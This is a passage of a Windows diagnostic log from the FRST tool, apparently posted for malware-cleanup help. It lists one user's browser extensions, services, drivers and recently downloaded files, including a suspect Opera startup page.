CHR Extension: (Google Drive) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-22]
CHR Extension: (YouTube) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-29]
CHR Extension: (Google Search) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (Google Sheets) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-25]
CHR Extension: (Google Docs Offline) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-16]
CHR Extension: (Ad.Block.Plus) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbkecbijnfiglcfogejflkcldeapodeb [2015-08-30]
CHR Extension: (Chrome Web Store Payments) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-11]
CHR Extension: (TunnelBear VPN) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\omdakjcmkglenbhjadbccaookpfjihpa [2017-08-01]
CHR Extension: (Gmail) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-21]
CHR Extension: (Chrome Media Router) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09]
CHR HKLM-x32\...\Chrome\Extension: [ffdcfjdljhbehggjdkdioajnknjcpbjb] - C:\Program Files (x86)\DAP\DAPChrome\DAPChrome6.crx <not found>
 
Opera: 
=======
OPR StartupUrls:  "hxxp://www.surfvox.com/" 
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BstHdAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Service.exe [441880 2016-06-14] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe [421400 2016-06-14] (BlueStack Systems, Inc.)
S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe [458264 2016-06-14] (BlueStack Systems, Inc.)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1343408 2014-02-24] (ESET)
S3 GalaxyClientService; J:\Games\GOG Galaxy\GalaxyClientService.exe [512576 2017-05-31] (GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [7955008 2017-05-31] (GOG.com)
U2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2016-10-10] (Hi-Rez Studios) [File not signed]
S2 iBtSiva; C:\Program Files (x86)\Intel\Bluetooth\ibtsiva.exe [129984 2015-04-01] (Intel Corporation)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-09] (Intel Corporation)
R2 LeService; C:\Program Files (x86)\Letv\LeService.exe [200624 2017-02-16] (乐视网信息技术(北京)股份有限公司)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193656 2016-09-30] (Logitech Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
R2 Micro Star SCM; C:\Windows\SysWOW64\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2014-05-29] ()
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [3916368 2016-01-09] (INCA Internet Co., Ltd.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2016-12-13] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2016-12-13] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [459832 2016-12-12] (NVIDIA Corporation)
R2 NVIDIA Wireless Controller Service; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe [1163712 2016-12-13] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2016-12-13] (NVIDIA Corporation)
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [344576 2014-04-17] (Qualcomm Atheros) [File not signed]
R2 SEVPNSERVER; C:\Program Files\SoftEther VPN Server\vpnserver_x64.exe [5253064 2016-06-15] (SoftEther VPN Project at University of Tsukuba, Japan.)
R2 TunnelBearMaintenance; C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe [41472 2016-05-11] ()
R2 UDisk Monitor Z5 Phone; C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe [585416 2013-11-18] ()
R2 UPSecurityInputService; C:\Windows\SysWOW64\UPEditNew\UPService.exe [361240 2016-05-07] (中国银联股份有限公司)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S3 WsDrvInst; I:\Dr.Fone for Android\DriverInstall.exe [103736 2015-10-27] (Wondershare)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3816176 2014-05-29] (Intel® Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 BfLwf; C:\Windows\System32\DRIVERS\bflwfx64.sys [82096 2014-04-10] (Qualcomm Atheros, Inc.)
S3 BstHdDrv; C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys [152672 2016-06-14] (BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\Bluestacks\BstkDrv.sys [270904 2016-05-30] (Bluestack System Inc. )
R3 btmaudio; C:\Windows\System32\drivers\btmaud.sys [87864 2014-11-05] (Motorola Solutions, Inc.)
R3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [142136 2015-01-13] (Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\System32\DRIVERS\btmhsf.sys [1448248 2015-01-13] (Motorola Solutions, Inc.)
R1 cryptfd; C:\Windows\System32\drivers\cryptfd.sys [193448 2017-03-03] ()
R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [239320 2013-09-17] (ESET)
U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [239296 2013-09-17] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [168256 2013-09-17] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [157432 2013-09-17] (ESET)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77376 2017-06-27] ()
S3 GeneralusbserialserZ52203; C:\Windows\System32\DRIVERS\CT_U_USBSER_Z5.sys [250568 2013-11-18] (QUALCOMM Incorporated)
R1 HWiNFO32; C:\Windows\system32\drivers\HWiNFO64A.SYS [27552 2016-10-29] (REALiX™)
R3 ibtusb; C:\Windows\System32\DRIVERS\ibtusb.sys [254192 2015-03-19] (Intel Corporation)
R3 Ke2200; C:\Windows\System32\DRIVERS\e22w7x64.sys [129200 2014-03-27] (Qualcomm Atheros, Inc.)
R3 Larmkanal; C:\Windows\System32\DRIVERS\Larmkanal.sys [32680 2015-06-09] (Adoriasoft LLC)
S2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [67736 2016-09-30] (Logitech Inc.)
R3 LGSHidFilt; C:\Windows\System32\DRIVERS\LGSHidFilt.Sys [64280 2016-09-30] (Logitech Inc.)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [188352 2017-08-09] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [101784 2017-08-10] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [45472 2017-08-10] (Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [253856 2017-08-10] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [84256 2017-08-10] (Malwarebytes)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [100312 2013-12-09] (Intel Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\Netwsw02.sys [3483112 2014-07-22] (Intel Corporation)
R1 nvkflt; C:\Windows\System32\DRIVERS\nvkflt.sys [307768 2016-12-12] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2016-12-13] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [46016 2016-12-13] (NVIDIA Corporation)
R2 PassGuard; C:\Windows\system32\drivers\PassGuard_x64.sys [111416 2016-12-05] ()
R3 Phosgene; C:\Windows\System32\DRIVERS\Phosgene.sys [33672 2015-09-02] (Adoriasoft LLC)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] ()
S3 pwdspio; C:\Windows\system32\pwdspio.sys [12504 2013-09-30] ()
S3 qcusbser; C:\Windows\System32\DRIVERS\qcusbser.sys [248864 2015-04-06] (QUALCOMM Incorporated)
R3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [444632 2013-10-18] (Realsil Semiconductor Corporation)
R3 SEE; C:\Windows\System32\drivers\see.sys [50208 2016-06-15] (SoftEther Corporation)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [867064 2014-11-10] (Duplex Secure Ltd.)
R3 tap-tb-0901; C:\Windows\System32\DRIVERS\tap-tb-0901.sys [38656 2015-08-10] (The OpenVPN Project)
R3 tapstrong; C:\Windows\System32\DRIVERS\tapstrong.sys [38760 2015-01-18] (The OpenVPN Project)
S3 Tosrfcom; no ImagePath
R1 VBoxUSBMon; C:\Windows\System32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\System32\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\SysWOW64\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-08-10 20:42 - 2017-08-10 20:42 - 000032949 _____ C:\Users\w7\Downloads\FRST.txt
2017-08-10 20:40 - 2017-08-10 20:42 - 000000000 ____D C:\FRST
2017-08-10 20:38 - 2017-08-10 20:40 - 002381824 _____ (Farbar) C:\Users\w7\Downloads\FRST64.exe
2017-08-10 14:30 - 2017-08-10 14:31 - 065365056 _____ (Oracle Corporation) C:\Users\w7\Downloads\jre-8u144-windows-x64.exe
2017-08-10 12:37 - 2017-08-10 12:40 - 005323816 _____ (Golden Frog, GmbH) C:\Users\w7\Downloads\VyprVPN-2.10.0.7514-installer.exe
2017-08-10 11:52 - 2017-08-10 11:59 - 008185288 _____ (Malwarebytes) C:\Users\w7\Downloads\AdwCleaner (1).exe
2017-08-10 11:51 - 2017-08-10 11:51 - 000000000 ____D C:\Users\w7\Desktop\temp
2017-08-10 11:43 - 2017-08-10 11:43 - 000000000 ____D C:\Users\w7\Desktop\New folder (3)
2017-08-10 11:42 - 2017-08-10 11:43 - 000610769 _____ C:\Users\w7\Downloads\depends22_x86.zip
2017-08-10 01:20 - 2017-08-10 01:20 - 004243464 _____ (Wargaming.net ) C:\Users\w7\Downloads\WoT_internet_install_asia.exe
2017-08-10 01:18 - 2017-08-10 01:19 - 003810270 _____ C:\Users\w7\Desktop\azq9Nnq_460sv.mp4
2017-08-09 14:03 - 2017-08-09 14:03 - 000001271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Registry Repair.lnk
2017-08-09 14:03 - 2017-08-09 14:03 - 000001259 _____ C:\Users\Public\Desktop\Registry Repair.lnk
2017-08-09 14:03 - 2017-08-09 14:03 - 000000000 ____D C:\Users\w7\AppData\Roaming\GlarySoft
2017-08-09 14:03 - 2017-08-09 14:03 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glarysoft
2017-08-09 14:02 - 2017-08-09 14:02 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2017-08-09 14:01 - 2017-08-09 14:02 - 005276496 _____ C:\Users\w7\Downloads\rrsetup.exe
2017-08-09 00:31 - 2017-08-09 00:31 - 000440076 _____ C:\Users\w7\Downloads\a4GQmnp_460sv.mp4
2017-08-09 00:23 - 2017-08-09 00:23 - 001953736 _____ C:\Users\w7\Downloads\kitten.mp4
2017-08-09 00:21 - 2017-08-09 00:21 - 002368875 _____ C:\Users\w7\Downloads\The Dynasphere, a 1930 monowheel vehicle inspired by da Vinci sketch.mp4
2017-08-09 00:15 - 2017-08-09 00:16 - 005245551 _____ C:\Users\w7\Downloads\ad9LrwD_460sv.mp4
2017-08-09 00:11 - 2017-08-09 00:13 - 003891438 _____ C:\Users\w7\Downloads\ax0zeRb_460sv.mp4
2017-08-08 23:59 - 2017-08-08 23:59 - 000010251 _____ C:\Users\w7\Downloads\boruto-naruto-next-generations-english-1131691.zip
2017-08-08 23:58 - 2017-08-08 23:58 - 000009709 _____ C:\Users\w7\Downloads\boruto-naruto-next-generations-english-1116392.zip
2017-08-08 22:27 - 2017-08-08 22:27 - 001384302 _____ C:\Users\w7\Downloads\azq9owb_460sv.mp4
2017-08-08 17:06 - 2017-08-08 17:10 - 014208467 _____ C:\Users\w7\Downloads\aeer5rq_460sv.mp4
2017-08-08 16:23 - 2017-08-08 16:23 - 000000916 _____ C:\Users\w7\Desktop\Warhammer 40,000 Dawn of War III.lnk
2017-08-08 16:23 - 2017-08-08 16:23 - 000000000 ____D C:\Users\w7\AppData\Roaming\Warhammer 40,000 Dawn of War III_Uninstall
2017-08-08 15:57 - 2017-08-08 21:34 - 000000000 ____D C:\Users\w7\AppData\LocalLow\Mozilla
2017-08-08 15:57 - 2017-08-08 15:57 - 000000936 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-08-08 15:57 - 2017-08-08 15:57 - 000000000 ____D C:\Program Files\Mozilla Firefox
2017-08-08 15:55 - 2017-08-08 15:55 - 000266192 _____ (Mozilla) C:\Users\w7\Downloads\Firefox Setup Stub 54.0.1.exe
2017-08-08 14:46 - 2017-08-08 14:50 - 004204032 _____ (crosire) C:\Users\w7\Downloads\ReShade_Setup_3.0.8.exe
2017-08-08 13:02 - 2017-08-08 13:03 - 002849145 _____ C:\Users\w7\Downloads\aGeZoqK_460sv.mp4
2017-08-08 01:51 - 2017-08-08 01:52 - 006111927 _____ C:\Users\w7\Downloads\flight of the conchords.mp4
2017-08-08 01:45 - 2017-08-08 01:46 - 006142841 _____ C:\Users\w7\Downloads\av7855b_460sv.mp4
2017-08-08 01:43 - 2017-08-08 01:43 - 003663897 _____ C:\Users\w7\Downloads\take me on.mp4
2017-08-07 23:24 - 2017-08-07 23:24 - 005241639 _____ C:\Users\w7\Downloads\a6VOQ98_460sv.mp4
2017-08-07 21:06 - 2017-08-07 21:06 - 001922954 _____ C:\Users\w7\Downloads\hammerhead worm.mp4
2017-08-07 20:21 - 2017-08-07 20:21 - 006232345 _____ C:\Users\w7\Downloads\ax01XxY_460sv.mp4
2017-08-07 16:33 - 2017-08-07 16:34 - 000114233 _____ C:\Users\w7\Downloads\gfsdk_ssao_d3d11.win64.zip
2017-08-07 15:20 - 2017-08-08 05:09 - 000000000 ____D C:\Users\w7\Desktop\New folder (2)
2017-08-07 15:10 - 2017-08-07 15:10 - 000000000 ____D C:\Users\w7\AppData\Roaming\Sun
2017-08-05 13:30 - 2017-08-05 13:31 - 103693321 _____ C:\Users\w7\Downloads\com.mobile.legends_v1.2.04.1822-12041822_Android-4.0.3.apk
2017-08-04 02:30 - 2017-08-04 02:30 - 000064552 _____ C:\Users\w7\Downloads\savebt.com-BT种子下载-SIRO-2313.HD.torrent
2017-08-03 17:37 - 2017-08-03 17:37 - 000000290 _____ C:\Users\w7\Downloads\All Shipments Batch File-291-1-0.7z
2017-08-03 15:22 - 2017-08-10 18:28 - 000084256 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-08-03 15:22 - 2017-08-10 12:14 - 000101784 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-08-03 15:18 - 2017-08-10 12:14 - 000253856 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-08-03 15:18 - 2017-08-10 12:14 - 000045472 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-08-03 15:18 - 2017-08-09 12:52 - 000188352 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-08-03 15:18 - 2017-08-03 15:18 - 000001879 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-08-03 15:18 - 2017-08-03 15:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-08-03 15:18 - 2017-06-27 12:06 - 000077376 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-08-03 15:17 - 2017-08-03 15:17 - 000000000 ____D C:\Program Files\Malwarebytes
2017-08-03 14:49 - 2017-08-03 14:49 - 007767731 _____ C:\Users\w7\Desktop\1947 HITS ARCHIVE_ Oh But I Do - Margaret Whiting (used in Agent Carter) - YouTube (480p).mp4
2017-08-03 14:10 - 2017-08-03 14:10 - 000000000 ____D C:\Users\w7\AppData\Roaming\Obsidium
2017-08-03 13:18 - 2017-08-03 13:18 - 009223984 _____ C:\Users\w7\Downloads\got mariachi.mp4
2017-08-03 00:24 - 2017-08-03 00:24 - 004212695 _____ C:\Users\w7\Downloads\mushrooms.mp4
2017-08-03 00:13 - 2017-08-03 00:13 - 003409364 _____ C:\Users\w7\Downloads\a888KX3_460sv.mp4
2017-08-03 00:10 - 2017-08-03 00:22 - 055970355 _____ C:\Users\w7\Desktop\nubia z11 nx531j twrp.zip
2017-08-02 18:57 - 2017-08-02 18:58 - 041109052 _____ C:\Users\w7\Documents\Batman of Shanghai (HD) - YouTube (720p).mp4
2017-08-02 18:27 - 2017-08-02 18:27 - 002350467 _____ C:\Users\w7\Downloads\barbie girl trump.mp4
2017-08-02 13:53 - 2017-08-02 13:53 - 004455470 _____ C:\Users\w7\Downloads\misheard lyrics.mp4
2017-08-01 22:06 - 2017-08-01 22:06 - 000000000 ____D C:\Users\w7\AppData\LocalLow\Smac
2017-08-01 18:26 - 2017-08-01 18:26 - 000001340 _____ C:\Users\w7\Desktop\icecat - Shortcut.lnk
2017-08-01 18:21 - 2017-08-01 18:21 - 000000000 ____D C:\Program Files\icecat
2017-08-01 18:18 - 2017-08-01 18:19 - 044450434 _____ C:\Users\w7\Downloads\icecat-38.8.0.en-US.win32.zip
2017-08-01 18:18 - 2017-08-01 18:18 - 005802747 _____ C:\Users\w7\Downloads\anjjZ55_460sv.mp4
2017-08-01 13:35 - 2017-08-01 13:35 - 012702200 _____ C:\Users\w7\Downloads\anjMBdB_460sv.mp4
2017-08-01 13:00 - 2017-08-01 13:00 - 000190526 _____ C:\Users\w7\Downloads\aq174jQ_460sv.mp4
2017-08-01 12:57 - 2017-08-01 12:58 - 002870031 _____ C:\Users\w7\Downloads\aWq1Bd4_460sv.mp4
2017-08-01 12:32 - 2017-08-01 12:32 - 002038247 _____ C:\Users\w7\Downloads\aKDDXj6_460sv.mp4
2017-08-01 12:20 - 2017-08-01 12:20 - 005932384 _____ C:\Users\w7\Downloads\THAI AD.mp4
2017-08-01 12:13 - 2017-08-01 12:13 - 003336064 _____ C:\Users\w7\Downloads\vr (2).mp4
2017-08-01 12:05 - 2017-08-01 12:05 - 003822652 _____ C:\Users\w7\Downloads\anjjdG0_460sv.mp4
2017-08-01 11:23 - 2017-08-01 11:23 - 000025788 _____ C:\Users\w7\Downloads\einstein-and-eddington_HI_english-194372.zip
2017-08-01 01:24 - 2017-08-01 01:25 - 035543442 _____ C:\Users\w7\Documents\Selena Gomez - Bad Liar - YouTube (1080p).mp4
2017-07-31 23:27 - 2017-07-31 23:27 - 000153456 _____ C:\Users\w7\Downloads\giphy.webp
2017-07-31 21:31 - 2017-07-31 21:31 - 006754944 _____ (ESET spol. s r.o.) C:\Users\w7\Downloads\esetonlinescanner_enu (1).exe
2017-07-31 21:28 - 2017-07-31 21:28 - 003617336 _____ (hxxp://advancedfilefixer.com/ ) C:\Users\w7\Downloads\AdvancedFileFixer_Setup.exe
2017-07-31 21:25 - 2017-07-31 21:26 - 006754944 _____ (ESET spol. s r.o.) C:\Users\w7\Downloads\esetonlinescanner_enu.exe
2017-07-31 21:18 - 2017-07-31 21:18 - 000001605 _____ C:\Users\w7\Desktop\Local - Shortcut.lnk
2017-07-31 20:35 - 2016-01-06 23:15 - 261328670 _____ C:\Users\w7\Desktop\main.23.com.worms4.app.obb
2017-07-31 20:34 - 2017-07-31 20:42 - 021756328 _____ C:\Users\w7\Downloads\Worms 4 v1.0.419806[DLC & Weapons -Unlocked].Apk
2017-07-31 20:33 - 2017-07-31 21:09 - 037705269 _____ C:\Users\w7\Downloads\open_gapps-arm64-7.1-full-20170731.zip.crdownload
2017-07-31 16:47 - 2017-07-31 17:37 - 259921709 _____ C:\Users\w7\Downloads\worms4.zip
2017-07-31 16:44 - 2017-07-31 16:49 - 021756328 _____ C:\Users\w7\Desktop\Worms 4 v1.0.419806[DLC & Weapons -Unlocked].Apk
2017-07-31 13:05 - 2017-07-31 13:05 - 021477376 _____ C:\Users\w7\Downloads\twrp-3.1.1-0-nx512j.img
2017-07-31 12:37 - 2017-07-31 12:38 - 002955265 _____ C:\Users\w7\Downloads\a6VVGg2_460sv.mp4
2017-07-31 11:09 - 2017-07-31 11:09 - 001526943 _____ C:\Users\w7\Downloads\azqqdpb_460sv.mp4
2017-07-30 15:59 - 2017-07-30 15:59 - 000000000 ____D C:\Users\w7\AppData\Local\SniperElite4
2017-07-30 15:58 - 2017-07-30 15:58 - 000000000 ____D C:\ProgramData\Sniper Elite 4
2017-07-30 15:48 - 2017-07-30 15:48 - 000158075 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E07.720p.HDTV.x264-MTB (4).rar
2017-07-30 15:44 - 2017-07-30 15:44 - 000158075 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E07.720p.HDTV.x264-MTB (3).rar
2017-07-30 15:41 - 2017-07-30 15:41 - 000240774 _____ C:\Users\w7\Downloads\[zmk.tw]doctor.who.2005.s10e07.720p.hdtv.x264-mtb.zip
2017-07-30 15:36 - 2017-07-30 15:36 - 000160518 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E02.720p.HDTV.x264-FoV (2).rar
2017-07-30 15:34 - 2017-07-30 15:34 - 000160518 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E02.720p.HDTV.x264-FoV (1).rar
2017-07-30 15:32 - 2017-07-30 15:32 - 000064804 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E01.720p.HDTV.x264-MTB.rar
2017-07-30 15:30 - 2017-07-30 15:30 - 000279008 _____ C:\Users\w7\Documents\Doctor.Who.2005.S10E01.720p.HDTV.HEVC.x265-iSm.ass
2017-07-30 15:20 - 2017-07-30 15:20 - 000158075 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E07.720p.HDTV.x264-MTB (2).rar
2017-07-30 15:18 - 2017-07-30 15:18 - 000158075 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E07.720p.HDTV.x264-MTB (1).rar
2017-07-30 14:37 - 2017-07-30 14:37 - 000257718 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E12.720p.HDTV.x264-FoV.zip
2017-07-30 14:36 - 2017-07-30 14:36 - 000226690 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E11.720p.HDTV.x264-FoV.zip
2017-07-30 14:35 - 2017-07-30 14:35 - 000246984 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E10.720p.HDTV.x264-FoV.zip
2017-07-30 14:34 - 2017-07-30 14:34 - 000148584 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E09.720p.WEB.h264-TBS.rar
2017-07-30 14:33 - 2017-07-30 14:33 - 000242677 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E08.720p.HDTV.x264-FoV.zip
2017-07-30 14:33 - 2017-07-30 14:33 - 000158075 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E07.720p.HDTV.x264-MTB.rar
2017-07-30 14:31 - 2017-07-30 14:31 - 000143989 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E06.720p.HDTV.x264-FoV.rar
2017-07-30 14:30 - 2017-07-30 14:30 - 000250954 _____ C:\Users\w7\Downloads\[zmk.tw]doctor_who_2005.10x05.720p_hdtv_x264-fov.mkv.zip
2017-07-30 14:30 - 2017-07-30 14:30 - 000129775 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E04.720p.HDTV.x264-FoV.rar
2017-07-30 14:29 - 2017-07-30 14:29 - 000140175 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E03.720p.WEB.x264-TBS.rar
2017-07-30 14:26 - 2017-07-30 14:26 - 000160518 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E02.720p.HDTV.x264-FoV.rar
2017-07-30 14:22 - 2017-07-30 14:22 - 000241426 _____ C:\Users\w7\Downloads\[zmk.tw]doctor.who.2005.s10e01.720p.hdtv.x264-mtb.zip
2017-07-30 14:05 - 2017-08-05 02:48 - 000000583 _____ C:\Users\Public\Desktop\Sniper Elite 4.lnk
2017-07-29 21:56 - 2017-07-29 21:56 - 005579541 _____ C:\Users\w7\Downloads\3rd rock.mp4
2017-07-29 21:49 - 2017-07-29 21:49 - 005809715 _____ C:\Users\w7\Downloads\voices.mp4
2017-07-29 21:34 - 2017-07-29 21:34 - 004654237 _____ C:\Users\w7\Downloads\talent.mp4
2017-07-29 21:19 - 2017-07-29 21:19 - 000140859 _____ C:\Users\w7\Downloads\a055pVq_460sv.mp4
2017-07-29 21:09 - 2017-07-29 21:09 - 001725168 _____ C:\Users\w7\Downloads\Mont Saint Michel is a beautiful place in France.mp4
2017-07-29 21:07 - 2017-07-29 21:07 - 003681616 _____ C:\Users\w7\Downloads\aOBz63v_460sv.mp4
2017-07-29 18:33 - 2017-07-29 18:35 - 059805361 _____ C:\Users\w7\Documents\Nubia Z17 hands-on_ the $410 flagship from China - YouTube (1080p).mp4
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-08-10 20:40 - 2016-08-09 03:55 - 000000000 ____D C:\Users\w7\AppData\Local\Nox
2017-08-10 20:33 - 2016-06-16 13:43 - 000000000 ____D C:\Program Files (x86)\TunnelBear
2017-08-10 20:14 - 2016-06-15 22:25 - 000000000 ____D C:\Program Files\SoftEther VPN Server
2017-08-10 19:55 - 2014-09-06 02:14 - 000000552 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2017-08-10 19:10 - 2016-08-09 03:56 - 000000000 ____D C:\Users\w7\vmlogs
2017-08-10 19:10 - 2016-08-09 03:56 - 000000000 ____D C:\Users\w7\.BigNox
2017-08-10 19:10 - 2016-02-20 00:55 - 000000000 ____D C:\Users\w7\.android
2017-08-10 14:43 - 2014-09-06 11:42 - 000000000 ____D C:\Users\w7\AppData\Roaming\vlc
2017-08-10 13:31 - 2015-08-21 17:54 - 000000000 ____D C:\Users\w7\AppData\Roaming\.strongvpn
2017-08-10 13:31 - 2009-07-14 11:20 - 000000000 ____D C:\Windows\system32\NDF
2017-08-10 13:31 - 2009-07-14 11:20 - 000000000 ____D C:\Windows\inf
2017-08-10 12:25 - 2015-06-19 23:21 - 000000000 ____D C:\ProgramData\boost_interprocess
2017-08-10 12:25 - 2014-08-31 13:12 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-10 12:21 - 2009-07-14 12:45 - 000026768 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
